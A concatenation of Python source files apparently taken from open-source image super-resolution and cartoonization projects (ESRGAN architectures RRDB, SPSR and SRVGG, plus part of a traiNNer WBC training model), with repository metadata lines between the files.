r"model.1.sub.\1.RDB\2.conv\3.0.\4": (
r"RRDB_trunk\.(\d+)\.RDB(\d)\.conv(\d+)\.(weight|bias)",
r"body\.(\d+)\.rdb(\d)\.conv(\d+)\.(weight|bias)",
),
}
if "params_ema" in self.state:
self.state = self.state["params_ema"]
self.num_blocks = self.get_num_blocks()
self.plus = any("conv1x1" in k for k in self.state.keys())
self.state = self.new_to_old_arch(self.state)
self.key_arr = list(self.state.keys())
# print(self.key_arr)
self.in_nc = self.state[self.key_arr[0]].shape[1]
self.out_nc = self.state[self.key_arr[-1]].shape[0]
self.scale = self.get_scale()
self.num_filters = self.state[self.key_arr[0]].shape[0]
c2x2 = False
if self.state["model.0.weight"].shape[-2] == 2:
c2x2 = True
self.scale = math.ceil(self.scale ** (1.0 / 3))
# Detect if pixelunshuffle was used (Real-ESRGAN)
if self.in_nc in (self.out_nc * 4, self.out_nc * 16) and self.out_nc in (
self.in_nc / 4,
self.in_nc / 16,
):
self.shuffle_factor = int(math.sqrt(self.in_nc / self.out_nc))
else:
self.shuffle_factor = None
upsample_block = {
"upconv": B.upconv_block,
"pixel_shuffle": B.pixelshuffle_block,
}.get(self.upsampler)
if upsample_block is None:
raise NotImplementedError(f"Upsample mode [{self.upsampler}] is not found")
if self.scale == 3:
upsample_blocks = upsample_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
upscale_factor=3,
act_type=self.act,
c2x2=c2x2,
)
else:
upsample_blocks = [
upsample_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
act_type=self.act,
c2x2=c2x2,
)
for _ in range(int(math.log(self.scale, 2)))
]
self.model = B.sequential(
# fea conv
B.conv_block(
in_nc=self.in_nc,
out_nc=self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
c2x2=c2x2,
),
B.ShortcutBlock(
B.sequential(
# rrdb blocks
*[
B.RRDB(
nf=self.num_filters,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=self.norm,
act_type=self.act,
mode="CNA",
plus=self.plus,
c2x2=c2x2,
)
for _ in range(self.num_blocks)
],
# lr conv
B.conv_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
kernel_size=3,
norm_type=self.norm,
act_type=None,
mode=self.mode,
c2x2=c2x2,
),
)
),
*upsample_blocks,
# hr_conv0
B.conv_block(
in_nc=self.num_filters,
out_nc=self.num_filters,
kernel_size=3,
norm_type=None,
act_type=self.act,
c2x2=c2x2,
),
# hr_conv1
B.conv_block(
in_nc=self.num_filters,
out_nc=self.out_nc,
kernel_size=3,
norm_type=None,
act_type=None,
c2x2=c2x2,
),
)
self.load_state_dict(self.state, strict=False)
def new_to_old_arch(self, state):
"""Convert a new-arch model state dictionary to an old-arch dictionary."""
if "params_ema" in state:
state = state["params_ema"]
if "conv_first.weight" not in state:
# model is already old arch, this is a loose check, but should be sufficient
return state
# add nb to state keys
for kind in ("weight", "bias"):
self.state_map[f"model.1.sub.{self.num_blocks}.{kind}"] = self.state_map[
f"model.1.sub./NB/.{kind}"
]
del self.state_map[f"model.1.sub./NB/.{kind}"]
old_state = OrderedDict()
for old_key, new_keys in self.state_map.items():
for new_key in new_keys:
if r"\1" in old_key:
for k, v in state.items():
sub = re.sub(new_key, old_key, k)
if sub != k:
old_state[sub] = v
else:
if new_key in state:
old_state[old_key] = state[new_key]
# Sort by first numeric value of each layer
def compare(item1, item2):
parts1 = item1.split(".")
parts2 = item2.split(".")
int1 = int(parts1[1])
int2 = int(parts2[1])
return int1 - int2
sorted_keys = sorted(old_state.keys(), key=functools.cmp_to_key(compare))
# Rebuild the output dict in the right order
out_dict = OrderedDict((k, old_state[k]) for k in sorted_keys)
return out_dict
def get_scale(self, min_part: int = 6) -> int:
n = 0
for part in list(self.state):
parts = part.split(".")[1:]
if len(parts) == 2:
part_num = int(parts[0])
if part_num > min_part and parts[1] == "weight":
n += 1
return 2**n
def get_num_blocks(self) -> int:
nbs = []
state_keys = self.state_map[r"model.1.sub.\1.RDB\2.conv\3.0.\4"] + (
r"model\.\d+\.sub\.(\d+)\.RDB(\d+)\.conv(\d+)\.0\.(weight|bias)",
)
for state_key in state_keys:
for k in self.state:
m = re.search(state_key, k)
if m:
nbs.append(int(m.group(1)))
if nbs:
break
return max(*nbs) + 1
def forward(self, x):
if self.shuffle_factor:
x = torch.pixel_unshuffle(x, downscale_factor=self.shuffle_factor)
return self.model(x)
``` |
{
"source": "JoeyBallentine/ESRGAN",
"score": 2
} |
#### File: utils/architecture/SPSR.py
```python
import math
import re
from collections import OrderedDict
from typing import Optional
import torch
import torch.nn as nn
import torch.nn.functional as F
import utils.architecture.block as B
from torch import Tensor
STATE_T = OrderedDict[str, Tensor]
class Get_gradient_nopadding(nn.Module):
def __init__(self):
super(Get_gradient_nopadding, self).__init__()
kernel_v = [[0, -1, 0], [0, 0, 0], [0, 1, 0]]
kernel_h = [[0, 0, 0], [-1, 0, 1], [0, 0, 0]]
kernel_h = torch.FloatTensor(kernel_h).unsqueeze(0).unsqueeze(0)
kernel_v = torch.FloatTensor(kernel_v).unsqueeze(0).unsqueeze(0)
self.weight_h = nn.Parameter(data=kernel_h, requires_grad=False)
self.weight_v = nn.Parameter(data=kernel_v, requires_grad=False)
def forward(self, x):
x_list = []
for i in range(x.shape[1]):
x_i = x[:, i]
x_i_v = F.conv2d(x_i.unsqueeze(1), self.weight_v, padding=1)
x_i_h = F.conv2d(x_i.unsqueeze(1), self.weight_h, padding=1)
x_i = torch.sqrt(torch.pow(x_i_v, 2) + torch.pow(x_i_h, 2) + 1e-6)
x_list.append(x_i)
x = torch.cat(x_list, dim=1)
return x
class SPSRNet(nn.Module):
def __init__(
self,
state_dict: STATE_T,
norm=None,
act: str = "leakyrelu",
upsampler: str = "upconv",
mode: str = "CNA",
):
super(SPSRNet, self).__init__()
self.state = state_dict
self.norm = norm
self.act = act
self.upsampler = upsampler
self.mode = mode
self.num_blocks = self.get_num_blocks()
self.in_nc = self.state["model.0.weight"].shape[1]
self.out_nc = self.state["f_HR_conv1.0.bias"].shape[0]
self.scale = self.get_scale(4)
print(self.scale)
self.num_filters = self.state["model.0.weight"].shape[0]
n_upscale = int(math.log(self.scale, 2))
if self.scale == 3:
n_upscale = 1
fea_conv = B.conv_block(
self.in_nc, self.num_filters, kernel_size=3, norm_type=None, act_type=None
)
rb_blocks = [
B.RRDB(
self.num_filters,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
for _ in range(self.num_blocks)
]
LR_conv = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=norm,
act_type=None,
mode=mode,
)
if upsampler == "upconv":
upsample_block = B.upconv_block
elif upsampler == "pixelshuffle":
upsample_block = B.pixelshuffle_block
else:
raise NotImplementedError(f"upsample mode [{upsampler}] is not found")
if self.scale == 3:
a_upsampler = upsample_block(
self.num_filters, self.num_filters, 3, act_type=act
)
else:
a_upsampler = [
upsample_block(self.num_filters, self.num_filters, act_type=act)
for _ in range(n_upscale)
]
self.HR_conv0_new = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=act,
)
self.HR_conv1_new = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.model = B.sequential(
fea_conv,
B.ShortcutBlockSPSR(B.sequential(*rb_blocks, LR_conv)),
*a_upsampler,
self.HR_conv0_new,
)
self.get_g_nopadding = Get_gradient_nopadding()
self.b_fea_conv = B.conv_block(
self.in_nc, self.num_filters, kernel_size=3, norm_type=None, act_type=None
)
self.b_concat_1 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_1 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_concat_2 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_2 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_concat_3 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_3 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_concat_4 = B.conv_block(
2 * self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_block_4 = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.b_LR_conv = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=norm,
act_type=None,
mode=mode,
)
if upsampler == "upconv":
upsample_block = B.upconv_block
elif upsampler == "pixelshuffle":
upsample_block = B.pixelshuffle_block
else:
raise NotImplementedError(f"upsample mode [{upsampler}] is not found")
if self.scale == 3:
b_upsampler = upsample_block(
self.num_filters, self.num_filters, 3, act_type=act
)
else:
b_upsampler = [
upsample_block(self.num_filters, self.num_filters, act_type=act)
for _ in range(n_upscale)
]
b_HR_conv0 = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=act,
)
b_HR_conv1 = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.b_module = B.sequential(*b_upsampler, b_HR_conv0, b_HR_conv1)
self.conv_w = B.conv_block(
self.num_filters, self.out_nc, kernel_size=1, norm_type=None, act_type=None
)
self.f_concat = B.conv_block(
self.num_filters * 2,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=None,
)
self.f_block = B.RRDB(
self.num_filters * 2,
kernel_size=3,
gc=32,
stride=1,
bias=True,
pad_type="zero",
norm_type=norm,
act_type=act,
mode="CNA",
)
self.f_HR_conv0 = B.conv_block(
self.num_filters,
self.num_filters,
kernel_size=3,
norm_type=None,
act_type=act,
)
self.f_HR_conv1 = B.conv_block(
self.num_filters, self.out_nc, kernel_size=3, norm_type=None, act_type=None
)
self.load_state_dict(self.state, strict=False)
def get_scale(self, min_part: int = 4) -> int:
n = 0
for part in list(self.state):
parts = part.split(".")
if len(parts) == 3:
part_num = int(parts[1])
if part_num > min_part and parts[0] == "model" and parts[2] == "weight":
n += 1
return 2 ** n
def get_num_blocks(self) -> int:
nb = 0
for part in list(self.state):
parts = part.split(".")
n_parts = len(parts)
if n_parts == 5 and parts[2] == "sub":
nb = int(parts[3])
return nb
def forward(self, x):
x_grad = self.get_g_nopadding(x)
x = self.model[0](x)
x, block_list = self.model[1](x)
x_ori = x
for i in range(5):
x = block_list[i](x)
x_fea1 = x
for i in range(5):
x = block_list[i + 5](x)
x_fea2 = x
for i in range(5):
x = block_list[i + 10](x)
x_fea3 = x
for i in range(5):
x = block_list[i + 15](x)
x_fea4 = x
x = block_list[20:](x)
# short cut
x = x_ori + x
x = self.model[2:](x)
x = self.HR_conv1_new(x)
x_b_fea = self.b_fea_conv(x_grad)
x_cat_1 = torch.cat([x_b_fea, x_fea1], dim=1)
x_cat_1 = self.b_block_1(x_cat_1)
x_cat_1 = self.b_concat_1(x_cat_1)
x_cat_2 = torch.cat([x_cat_1, x_fea2], dim=1)
x_cat_2 = self.b_block_2(x_cat_2)
x_cat_2 = self.b_concat_2(x_cat_2)
x_cat_3 = torch.cat([x_cat_2, x_fea3], dim=1)
x_cat_3 = self.b_block_3(x_cat_3)
x_cat_3 = self.b_concat_3(x_cat_3)
x_cat_4 = torch.cat([x_cat_3, x_fea4], dim=1)
x_cat_4 = self.b_block_4(x_cat_4)
x_cat_4 = self.b_concat_4(x_cat_4)
x_cat_4 = self.b_LR_conv(x_cat_4)
# short cut
x_cat_4 = x_cat_4 + x_b_fea
x_branch = self.b_module(x_cat_4)
# x_out_branch = self.conv_w(x_branch)
########
x_branch_d = x_branch
x_f_cat = torch.cat([x_branch_d, x], dim=1)
x_f_cat = self.f_block(x_f_cat)
x_out = self.f_concat(x_f_cat)
x_out = self.f_HR_conv0(x_out)
x_out = self.f_HR_conv1(x_out)
#########
# return x_out_branch, x_out, x_grad
return x_out
``` |
{
"source": "joeyballentine/ESRGAN",
"score": 3
} |
#### File: utils/architecture/SRVGG.py
```python
import math
from collections import OrderedDict
from typing import Union
import torch.nn as nn
import torch.nn.functional as F
from torch import Tensor
class SRVGGNetCompact(nn.Module):
"""A compact VGG-style network structure for super-resolution.
It is a compact network structure, which performs upsampling in the last layer and no convolution is
conducted on the HR feature space.
Args:
num_in_ch (int): Channel number of inputs. Default: 3.
num_out_ch (int): Channel number of outputs. Default: 3.
num_feat (int): Channel number of intermediate features. Default: 64.
num_conv (int): Number of convolution layers in the body network. Default: 16.
upscale (int): Upsampling factor. Default: 4.
act_type (str): Activation type, options: 'relu', 'prelu', 'leakyrelu'. Default: prelu.
"""
def __init__(
self,
state_dict,
act_type: str = "prelu",
):
super(SRVGGNetCompact, self).__init__()
self.act_type = act_type
self.state = state_dict
if "params" in self.state:
self.state = self.state["params"]
self.key_arr = list(self.state.keys())
self.num_in_ch = self.get_in_nc()
self.num_feat = self.get_num_feats()
self.num_conv = self.get_num_conv()
self.num_out_ch = self.num_in_ch # :(
self.scale = self.get_scale()
self.body = nn.ModuleList()
# the first conv
self.body.append(nn.Conv2d(self.num_in_ch, self.num_feat, 3, 1, 1))
# the first activation
if act_type == "relu":
activation = nn.ReLU(inplace=True)
elif act_type == "prelu":
activation = nn.PReLU(num_parameters=self.num_feat)
elif act_type == "leakyrelu":
activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.body.append(activation)
# the body structure
for _ in range(self.num_conv):
self.body.append(nn.Conv2d(self.num_feat, self.num_feat, 3, 1, 1))
# activation
if act_type == "relu":
activation = nn.ReLU(inplace=True)
elif act_type == "prelu":
activation = nn.PReLU(num_parameters=self.num_feat)
elif act_type == "leakyrelu":
activation = nn.LeakyReLU(negative_slope=0.1, inplace=True)
self.body.append(activation)
# the last conv
self.body.append(nn.Conv2d(self.num_feat, self.pixelshuffle_shape, 3, 1, 1))
# upsample
self.upsampler = nn.PixelShuffle(self.scale)
self.load_state_dict(self.state, strict=False)
def get_num_conv(self) -> int:
return (int(self.key_arr[-1].split(".")[1]) - 2) // 2
def get_num_feats(self) -> int:
return self.state[self.key_arr[0]].shape[0]
def get_in_nc(self) -> int:
return self.state[self.key_arr[0]].shape[1]
def get_scale(self) -> int:
self.pixelshuffle_shape = self.state[self.key_arr[-1]].shape[0]
# Assume out_nc is the same as in_nc
# I cant think of a better way to do that
self.num_out_ch = self.num_in_ch
scale = math.sqrt(self.pixelshuffle_shape / self.num_out_ch)
if scale - int(scale) > 0:
print(
"out_nc is probably different than in_nc, scale calculation might be wrong"
)
scale = int(scale)
return scale
def forward(self, x):
out = x
for i in range(0, len(self.body)):
out = self.body[i](out)
out = self.upsampler(out)
# add the nearest upsampled image, so that the network learns the residual
base = F.interpolate(x, scale_factor=self.scale, mode="nearest")
out += base
return out
``` |
{
"source": "JoeyBallentine/traiNNer",
"score": 2
} |
#### File: codes/models/wbc_model.py
```python
from __future__ import absolute_import
import os
import logging
from collections import OrderedDict
import itertools
import torch
import torch.nn as nn
from joblib import Parallel, delayed, parallel_backend
import models.networks as networks
from .base_model import BaseModel, nullcast
from . import losses
from . import optimizers
from . import schedulers
from . import swa
from dataops.batchaug import BatchAug
from dataops.filters import FilterHigh, FilterLow, GuidedFilter # , FilterX
from dataops.colors import ColorShift
from dataops.augmennt.augmennt import transforms
from dataops.common import tensor2np, np2tensor
from utils.image_pool import ImagePool
logger = logging.getLogger('base')
load_amp = (hasattr(torch.cuda, "amp") and hasattr(torch.cuda.amp, "autocast"))
if load_amp:
from torch.cuda.amp import autocast, GradScaler
logger.info('AMP library available')
else:
logger.info('AMP library not available')
# TODO: can move to some common module and reuse for other fns
def batch_superpixel(batch_image: torch.Tensor,
superpixel_fn: callable, num_job:int=None) -> torch.Tensor:
""" Convert a batch of images to superpixel in parallel
Args:
batch_image: the batch of images. Shape must be [b,c,h,w]
superpixel_fn: the callable function to apply in parallel
num_job: the number of threads to parallelize on. Default: will
use as many threads as the batch size 'b'.
Returns:
superpixel tensor, shape = [b,c,h,w]
"""
if not num_job:
num_job = batch_image.shape[0]
with parallel_backend('threading', n_jobs=num_job):
batch_out = Parallel()(delayed(superpixel_fn)
(image) for image in batch_image)
return torch.stack(batch_out, dim=0)
def get_sp_transform(train_opt:dict, znorm:bool=True):
n_segments = train_opt.get('sp_n_segments', 200) # 500
max_size = train_opt.get('sp_max_size', None) # crop_size
# 'selective' 'cluster' 'rag' None
reduction = train_opt.get('sp_reduction', 'selective')
# 'seeds', 'slic', 'slico', 'mslic', 'sk_slic', 'sk_felzenszwalb'
algo = train_opt.get('sp_algo', 'sk_felzenszwalb')
gamma_range = train_opt.get('sp_gamma_range', (100, 120))
superpixel_fn = transforms.Compose([
transforms.Lambda(lambda img: tensor2np(img, rgb2bgr=True,
denormalize=znorm, remove_batch=False)),
transforms.Superpixels(
p_replace=1, n_segments=n_segments, algo=algo,
reduction=reduction, max_size=max_size, p=1),
transforms.RandomGamma(gamma_range=gamma_range, gain=1, p=1),
transforms.Lambda(lambda img: np2tensor(img, bgr2rgb=True,
normalize=znorm, add_batch=False))
])
return superpixel_fn
class WBCModel(BaseModel):
""" This class implements the white-box cartoonization (WBC) model,
for learning image-to-image translation from A (source domain) to B
(target domain) without paired data.
WBC paper:
https://systemerrorwang.github.io/White-box-Cartoonization/paper/06791.pdf
"""
def __init__(self, opt):
"""Initialize the WBC model class.
Parameters:
opt (Option dictionary): stores all the experiment flags
"""
super(WBCModel, self).__init__(opt)
train_opt = opt['train']
# fetch lambda_idt if provided for identity loss
self.lambda_idt = train_opt['lambda_identity']
# specify the images you want to save/display. The training/test
# scripts will call <BaseModel.get_current_visuals>
self.visual_names = ['real_A', 'fake_B', 'real_B']
if self.is_train and self.lambda_idt and self.lambda_idt > 0.0:
# if identity loss is used, we also visualize idt_B=G(B)
self.visual_names.append('idt_B')
# specify the models you want to load/save to the disk.
# The training/test scripts will call <BaseModel.save_networks> and <BaseModel.load_networks>
# for training and testing, a generator 'G' is needed
self.model_names = ['G']
# define networks (both generator and discriminator) and load pretrained models
self.netG = networks.define_G(opt).to(self.device) # G
if self.is_train:
self.netG.train()
if train_opt['gan_weight']:
# add discriminators to the network list
self.model_names.append('D_S') # surface
self.model_names.append('D_T') # texture
self.netD_S = networks.define_D(opt).to(self.device)
t_opt = opt.copy() # TODO: tmp to reuse same config.
t_opt['network_D']['input_nc'] = 1
self.netD_T = networks.define_D(t_opt).to(self.device)
self.netD_T.train()
self.netD_S.train()
self.load() # load 'G', 'D_T' and 'D_S' if needed
# additional WBC component, initial guided filter
#TODO: parameters for GFs can be in options file
self.guided_filter = GuidedFilter(r=1, eps=1e-2)
if self.is_train:
if self.lambda_idt and self.lambda_idt > 0.0:
# only works when input and output images have the same
# number of channels
assert opt['input_nc'] == opt['output_nc']
# create image buffers to store previously generated images
self.fake_S_pool = ImagePool(opt['pool_size'])
self.fake_T_pool = ImagePool(opt['pool_size'])
# Setup batch augmentations
#TODO: test
self.mixup = train_opt.get('mixup', None)
if self.mixup:
self.mixopts = train_opt.get('mixopts', ["blend", "rgb", "mixup", "cutmix", "cutmixup"]) # , "cutout", "cutblur"]
self.mixprob = train_opt.get('mixprob', [1.0, 1.0, 1.0, 1.0, 1.0]) # , 1.0, 1.0]
self.mixalpha = train_opt.get('mixalpha', [0.6, 1.0, 1.2, 0.7, 0.7]) # , 0.001, 0.7]
self.aux_mixprob = train_opt.get('aux_mixprob', 1.0)
self.aux_mixalpha = train_opt.get('aux_mixalpha', 1.2)
self.mix_p = train_opt.get('mix_p', None)
# Setup frequency separation
self.fs = train_opt.get('fs', None)
self.f_low = None
self.f_high = None
if self.fs:
lpf_type = train_opt.get('lpf_type', "average")
hpf_type = train_opt.get('hpf_type', "average")
self.f_low = FilterLow(filter_type=lpf_type).to(self.device)
self.f_high = FilterHigh(filter_type=hpf_type).to(self.device)
# Initialize the losses with the opt parameters
# Generator losses:
# for the losses that don't require high precision (can use half precision)
self.generatorlosses = losses.GeneratorLoss(opt, self.device)
# for losses that need high precision (use out of the AMP context)
self.precisegeneratorlosses = losses.PreciseGeneratorLoss(opt, self.device)
# TODO: show the configured losses names in logger
# print(self.generatorlosses.loss_list)
# set filters losses for each representation
self.surf_losses = opt['train'].get('surf_losses', [])
self.text_losses = opt['train'].get('text_losses', [])
self.struct_losses = opt['train'].get('struct_losses', ['fea'])
self.cont_losses = opt['train'].get('cont_losses', ['fea'])
self.reg_losses = opt['train'].get('reg_losses', ['tv'])
# add identity loss if configured
self.idt_losses = []
if self.is_train and self.lambda_idt and self.lambda_idt > 0.0:
self.idt_losses = opt['train'].get('idt_losses', ['pix'])
# custom representations scales
self.stru_w = opt['train'].get('struct_scale', 1)
self.cont_w = opt['train'].get('content_scale', 1)
self.text_w = opt['train'].get('texture_scale', 1)
self.surf_w = opt['train'].get('surface_scale', 0.1)
self.reg_w = opt['train'].get('reg_scale', 1)
# additional WBC components
self.colorshift = ColorShift()
self.guided_filter_surf = GuidedFilter(r=5, eps=2e-1)
self.sp_transform = get_sp_transform(train_opt, opt['datasets']['train']['znorm'])
# Discriminator loss:
if train_opt['gan_type'] and train_opt['gan_weight']:
# TODO:
# self.criterionGAN = GANLoss(train_opt['gan_type'], 1.0, 0.0).to(self.device)
self.cri_gan = True
diffaug = train_opt.get('diffaug', None)
dapolicy = None
if diffaug: # TODO: this if should not be necessary
dapolicy = train_opt.get('dapolicy', 'color,translation,cutout') # original
self.adversarial = losses.Adversarial(
train_opt=train_opt, device=self.device,
diffaug=diffaug, dapolicy=dapolicy, conditional=False)
# TODO:
# D_update_ratio and D_init_iters are for WGAN
# self.D_update_ratio = train_opt.get('D_update_ratio', 1)
# self.D_init_iters = train_opt.get('D_init_iters', 0)
else:
self.cri_gan = False
# Initialize optimizers
self.optGstep = False
self.optDstep = False
if self.cri_gan:
# self.optimizers, self.optimizer_G, self.optimizer_D = optimizers.get_optimizers(
# self.cri_gan, [self.netD_T, self.netD_S], self.netG,
# train_opt, logger, self.optimizers)
self.optimizers, self.optimizer_G, self.optimizer_D = optimizers.get_optimizers(
cri_gan=self.cri_gan,
netG=self.netG,
optim_paramsD=itertools.chain(self.netD_T.parameters(), self.netD_S.parameters()),
train_opt=train_opt, logger=logger, optimizers=self.optimizers)
else:
self.optimizers, self.optimizer_G = optimizers.get_optimizers(
None, None, self.netG, train_opt, logger, self.optimizers)
self.optDstep = True
# Prepare schedulers
self.schedulers = schedulers.get_schedulers(
optimizers=self.optimizers, schedulers=self.schedulers, train_opt=train_opt)
# Configure SWA
self.swa = opt.get('use_swa', False)
if self.swa:
self.swa_start_iter = train_opt.get('swa_start_iter', 0)
# self.swa_start_epoch = train_opt.get('swa_start_epoch', None)
swa_lr = train_opt.get('swa_lr', 0.0001)
swa_anneal_epochs = train_opt.get('swa_anneal_epochs', 10)
swa_anneal_strategy = train_opt.get('swa_anneal_strategy', 'cos')
# TODO: Note: This could be done in resume_training() instead, to prevent creating
# the swa scheduler and model before they are needed
self.swa_scheduler, self.swa_model = swa.get_swa(
self.optimizer_G, self.netG, swa_lr, swa_anneal_epochs, swa_anneal_strategy)
self.load_swa() # load swa from resume state
logger.info('SWA enabled. Starting on iter: {}, lr: {}'.format(self.swa_start_iter, swa_lr))
# Configure virtual batch
batch_size = opt["datasets"]["train"]["batch_size"]
virtual_batch = opt["datasets"]["train"].get('virtual_batch_size', None)
self.virtual_batch = virtual_batch if virtual_batch \
>= batch_size else batch_size
self.accumulations = self.virtual_batch // batch_size
self.optimizer_G.zero_grad()
if self.cri_gan:
self.optimizer_D.zero_grad()
# Configure AMP
self.amp = load_amp and opt.get('use_amp', False)
if self.amp:
self.cast = autocast
self.amp_scaler = GradScaler()
logger.info('AMP enabled')
else:
self.cast = nullcast
# Configure FreezeD
if self.cri_gan:
self.feature_loc = None
loc = train_opt.get('freeze_loc', False)
if loc:
disc = opt["network_D"].get('which_model_D', False)
if "discriminator_vgg" in disc and "fea" not in disc:
loc = (loc*3)-2
elif "patchgan" in disc:
loc = (loc*3)-1
# TODO: TMP, for now only tested with the vgg-like or patchgan discriminators
if "discriminator_vgg" in disc or "patchgan" in disc:
self.feature_loc = loc
logger.info('FreezeD enabled')
# create logs dictionaries
self.log_dict = OrderedDict()
self.log_dict_T = OrderedDict()
self.log_dict_S = OrderedDict()
self.print_network(verbose=False) # TODO: pass verbose flag from config file
def feed_data(self, data):
"""Unpack input data from the dataloader and perform necessary pre-processing steps.
Parameters:
data (dict): include the data itself and its metadata information.
The option 'direction' can be used to swap images in domain A and domain B.
"""
# TODO: images currently being flipped with BtoA during read, check logic
# AtoB = self.opt.get('direction') == 'AtoB'
# self.real_A = data['A' if AtoB else 'B'].to(self.device)
# self.real_B = data['B' if AtoB else 'A'].to(self.device)
# self.image_paths = data['A_path' if AtoB else 'B_path']
self.real_A = data['A'].to(self.device)
self.real_B = data['B'].to(self.device)
self.image_paths = data['A_path']
def forward(self):
"""Run forward pass; called by both functions <optimize_parameters> and <test>."""
fake_B = self.netG(self.real_A) # G(A)
self.fake_B = self.guided_filter(self.real_A, fake_B)
if self.is_train:
# generate representations images
# surface: fake_blur
self.fake_blur = self.guided_filter_surf(
self.fake_B, self.fake_B)
# surface: real_blur (cartoon)
self.real_blur = self.guided_filter_surf(
self.real_B, self.real_B)
# texture: fake_gray, real_gray (cartoon)
self.fake_gray, self.real_gray = self.colorshift(
self.fake_B, self.real_B)
# structure: get superpixels (sp_real)
self.sp_real = (
batch_superpixel(
self.fake_B.detach(), # self.real_A, #
self.sp_transform)
).to(self.device)
def backward_D_Basic(self, netD, real, fake, log_dict):
"""Calculate GAN loss for the discriminator
Parameters:
netD (network): the discriminator D
real (tensor array): real images
fake (tensor array): images generated by a generator
Return the discriminator loss.
Also calls l_d_total.backward() to calculate the gradients.
"""
l_d_total = 0
with self.cast():
l_d_total, gan_logs = self.adversarial(
fake, real, netD=netD,
stage='discriminator', fsfilter=self.f_high)
for g_log in gan_logs:
log_dict[g_log] = gan_logs[g_log]
l_d_total /= self.accumulations
# calculate gradients
if self.amp:
# call backward() on scaled loss to create scaled gradients.
self.amp_scaler.scale(l_d_total).backward()
else:
l_d_total.backward()
# return l_d_total
return log_dict
def backward_D_T(self):
"""Calculate GAN loss for texture discriminator D_T"""
fake_gray = self.fake_T_pool.query(self.fake_gray)
self.log_dict_T = self.backward_D_Basic(
self.netD_T, self.real_gray, fake_gray, self.log_dict_T)
# aggregate logs to global logger
for kls_T, vls_T in self.log_dict_T.items():
self.log_dict[f'{kls_T}_T'] = vls_T # * self.text_w
def backward_D_S(self):
"""Calculate GAN loss for surface discriminator D_S"""
fake_blur = self.fake_S_pool.query(self.fake_blur)
self.log_dict_S = self.backward_D_Basic(
self.netD_S, self.real_blur, fake_blur, self.log_dict_S)
# aggregate logs to global logger
for kls_S, vls_S in self.log_dict_S.items():
self.log_dict[f'{kls_S}_S'] = vls_S # * self.surf_w
def backward_G(self):
"""Calculate the loss for generator G"""
# prepare losses and image pairs
rep_names = ['surf', 'text', 'struct', 'cont', 'reg']
selectors = [self.surf_losses, self.text_losses,
self.struct_losses, self.cont_losses, self.reg_losses]
sel_fakes = [self.fake_blur, self.fake_gray,
self.fake_B, self.fake_B, self.fake_B]
sel_reals = [self.real_blur, self.real_gray,
self.sp_real, self.real_A, self.real_B]
rep_ws = [self.surf_w, self.text_w,
self.stru_w, self.cont_w, self.reg_w]
l_g_total = 0
# l_g_total = torch.zeros(1) # 0
with self.cast():
if self.lambda_idt and self.lambda_idt > 0:
self.idt_B = self.netG(self.real_B)
log_idt_dict = OrderedDict()
# Identity loss (fp16)
if self.lambda_idt and self.lambda_idt > 0 and self.idt_losses:
# G should be identity if real_B is fed: ||G(B) - B|| = 0
loss_idt_B, log_idt_dict = self.generatorlosses(
self.idt_B, self.real_B, log_idt_dict,
self.f_low, selector=self.idt_losses)
l_g_total += sum(loss_idt_B) * self.lambda_idt / self.accumulations
for kidt_B, vidt_B in log_idt_dict.items():
self.log_dict[f'{kidt_B}_idt'] = vidt_B
if self.cri_gan:
# texture adversarial loss
l_g_gan_T = self.adversarial(
self.fake_gray, self.real_gray, netD=self.netD_T,
stage='generator', fsfilter=self.f_high)
self.log_dict_T['l_g_gan'] = l_g_gan_T.item()
l_g_total += self.text_w * l_g_gan_T / self.accumulations
# surface adversarial loss
l_g_gan_S = self.adversarial(
self.fake_blur, self.real_blur, netD=self.netD_S,
stage='generator', fsfilter=self.f_high)
self.log_dict_S['l_g_gan'] = l_g_gan_S.item()
l_g_total += self.surf_w * l_g_gan_S / self.accumulations
# calculate remaining losses
for sn, fake, real, sel, w in zip(
rep_names, sel_fakes, sel_reals, selectors, rep_ws):
if not sel:
continue
loss_results, log_dict = self.generatorlosses(
fake, real, {}, self.f_low, selector=sel)
l_g_total += w * sum(loss_results) / self.accumulations
for ksel, vsel in log_dict.items():
self.log_dict[f'{ksel}_{sn}'] = vsel # * w
# high precision generator losses (can be affected by AMP half precision)
if self.precisegeneratorlosses.loss_list:
if self.lambda_idt and self.lambda_idt > 0 and self.idt_losses:
# Identity loss (precise losses)
# G should be identity if real_B is fed: ||G(B) - B|| = 0
precise_loss_idt_B, log_idt_dict = self.precisegeneratorlosses(
self.idt_B, self.real_B, log_idt_dict,
self.f_low, selector=self.idt_losses)
